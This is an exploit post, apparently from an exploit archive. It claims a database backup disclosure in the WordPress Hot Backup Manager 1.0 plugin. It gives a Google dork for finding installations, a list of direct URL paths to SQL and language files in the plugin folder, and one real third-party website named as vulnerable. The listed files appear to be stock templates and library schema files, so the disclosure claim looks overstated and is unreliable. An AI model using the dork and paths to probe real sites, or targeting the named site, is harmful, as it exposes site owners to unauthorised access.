WordPress Hot Backup Manager plugin version 1.0 suffers from a database disclosure vulnerability.
2c5d6ffe3ad676d478ba874b1a20264c#################################################################################################
# Exploit Title : WordPress Hot Backup Manager 1.0 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Software Created Date By Owner : 16th March 2012
# Vendor Homepage : wordpress.org ~ github.com/eugene-manuilov
# Software Download Link : N/A
# Tested On : Windows and Linux
# Version Information : 1.0
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/BackupManager/libs/''
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110139
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2244
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31469
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/mysql.sql
/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/pgsql.sql
/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/sqlite3.sql
/wp-content/plugins/BackupManager/templates/sql/dump-footer.sql
/wp-content/plugins/BackupManager/templates/sql/dump-header.sql
/wp-content/plugins/BackupManager/templates/sql/function.sql
/wp-content/plugins/BackupManager/templates/sql/insert-after.sql
/wp-content/plugins/BackupManager/templates/sql/insert-before.sql
/wp-content/plugins/BackupManager/templates/sql/procedure.sql
/wp-content/plugins/BackupManager/templates/sql/table.sql
/wp-content/plugins/BackupManager/templates/sql/trigger.sql
/wp-content/plugins/BackupManager/templates/sql/view.sql
/wp-content/plugins/BackupManager/languages/hotbackup-en_US.mo
#################################################################################################
# Example Vulnerable Site =>
[+]
okanmarin.com.tr/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/mysql.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################